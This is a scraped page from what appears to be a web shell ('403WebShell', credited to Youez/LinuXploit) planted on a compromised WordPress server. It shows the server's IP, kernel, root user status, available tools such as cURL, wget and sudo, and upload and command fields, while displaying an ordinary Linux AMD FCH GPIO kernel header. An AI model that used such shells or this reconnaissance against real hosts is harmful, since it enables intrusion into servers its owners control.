WordPress

Briefly unavailable for scheduled maintenance.
Check back in a some hours.
403WebShell
403Webshell
Server IP : 38.242.244.58  /  Your IP : 216.73.217.174
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux vmi1486879.contaboserver.net 5.4.0-166-generic #183-Ubuntu SMP Mon Oct 2 11:28:33 UTC 2023 x86_64
User : root ( 0)
PHP Version : 7.4.3-4ubuntu2.19
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /lib/modules/5.4.0-165-generic/build/include/linux/platform_data/gpio/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /lib/modules/5.4.0-165-generic/build/include/linux/platform_data/gpio/gpio-amd-fch.h
/* SPDX-License-Identifier: GPL-2.0+ */

/*
 * AMD FCH gpio driver platform-data
 *
 * Copyright (C) 2018 metux IT consult
 * Author: Enrico Weigelt <info@metux.net>
 *
 */

#ifndef __LINUX_PLATFORM_DATA_GPIO_AMD_FCH_H
#define __LINUX_PLATFORM_DATA_GPIO_AMD_FCH_H

#define AMD_FCH_GPIO_DRIVER_NAME "gpio_amd_fch"

/*
 * gpio register index definitions
 */
#define AMD_FCH_GPIO_REG_GPIO49		0x40
#define AMD_FCH_GPIO_REG_GPIO50		0x41
#define AMD_FCH_GPIO_REG_GPIO51		0x42
#define AMD_FCH_GPIO_REG_GPIO59_DEVSLP0	0x43
#define AMD_FCH_GPIO_REG_GPIO57		0x44
#define AMD_FCH_GPIO_REG_GPIO58		0x45
#define AMD_FCH_GPIO_REG_GPIO59_DEVSLP1	0x46
#define AMD_FCH_GPIO_REG_GPIO64		0x47
#define AMD_FCH_GPIO_REG_GPIO68		0x48
#define AMD_FCH_GPIO_REG_GPIO66_SPKR	0x5B
#define AMD_FCH_GPIO_REG_GPIO71		0x4D
#define AMD_FCH_GPIO_REG_GPIO32_GE1	0x59
#define AMD_FCH_GPIO_REG_GPIO33_GE2	0x5A
#define AMT_FCH_GPIO_REG_GEVT22		0x09

/*
 * struct amd_fch_gpio_pdata - GPIO chip platform data
 * @gpio_num: number of entries
 * @gpio_reg: array of gpio registers
 * @gpio_names: array of gpio names
 */
struct amd_fch_gpio_pdata {
	int			gpio_num;
	int			*gpio_reg;
	const char * const	*gpio_names;
};

#endif /* __LINUX_PLATFORM_DATA_GPIO_AMD_FCH_H */

Youez - 2016 - github.com/yon3zu
LinuXploit